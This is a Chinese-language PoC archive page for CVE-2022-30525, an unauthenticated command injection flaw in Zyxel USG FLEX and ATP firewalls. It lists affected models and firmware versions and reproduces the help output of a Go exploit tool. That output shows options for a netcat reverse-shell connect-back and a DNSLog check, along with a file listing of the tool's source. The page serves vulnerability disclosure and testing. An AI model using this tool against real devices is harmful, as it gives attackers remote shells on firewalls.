关联漏洞
标题:
合勤科技 USG FLEX 操作系统命令注入漏洞
(CVE-2022-30525)
描述:Zyxel USG FLEX是中国合勤科技(Zyxel)公司的一款防火墙。提供灵活的 VPN 选项(IPsec、SSL 或 L2TP),为远程工作和管理提供灵活的安全远程访问。 合勤科技 USG FLEX 5.00版本至5.21版本、存在安全漏洞。攻击者利用该漏洞修改特定文件,在易受攻击的设备上执行一些操作系统命令。
描述
CVE-2022-30525(Zxyel 防火墙命令注入)的概念证明漏洞利用
介绍
# CVE-2022-30525
Zyxel 防火墙未经身份验证的远程命令注入漏洞
## 影响组件
USG FLEX 100, 100W, 200, 500, 700 USG20-VPN, USG20W-VPN ATP 100, 200, 500, 700, 800
## 固件版本
ZLD5.00 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch 1 ZLD5.10 thru ZLD5.21 Patch
## help
```shell
[root@localhost ~]# ./CVE-2022-30525 -h
NAME:
CVE-2022-30525 - Zyxel Firewall Command Injection (CVE-2022-30525)
USAGE:
CVE-2022-30525 [global options] command [command options] [arguments...]
COMMANDS:
nc use netcat listener
dnslog, d USE DNSLog
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--help, -h show help (default: false)
[root@localhost ~]# ./CVE-2022-30525 nc -h
NAME:
CVE-2022-30525 nc - use netcat listener
USAGE:
CVE-2022-30525 nc [command options] [arguments...]
OPTIONS:
--rhost value The remote address to exploit
--rport value The remote port to exploit (default: 443)
--lhost value The local address to connect back to
--lport value The local port to connect back to (default: 1270)
--protocol value The protocol handler to use (default: https://)
--ncpath value The path to nc (default: /usr/bin/nc)
--help, -h show help (default: false)
[root@localhost ~]# ./CVE-2022-30525 dnslog "http://192.168.0.123"
```
文件快照
[4.0K] /data/pocs/362c9eec745bd775e124b1623026c6cab549b8da
├── [3.4K] CVE-2022-30525.go
├── [4.0K] dnslog
│ └── [ 758] dnslog.go
├── [ 449] go.mod
└── [1.3K] README.md
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。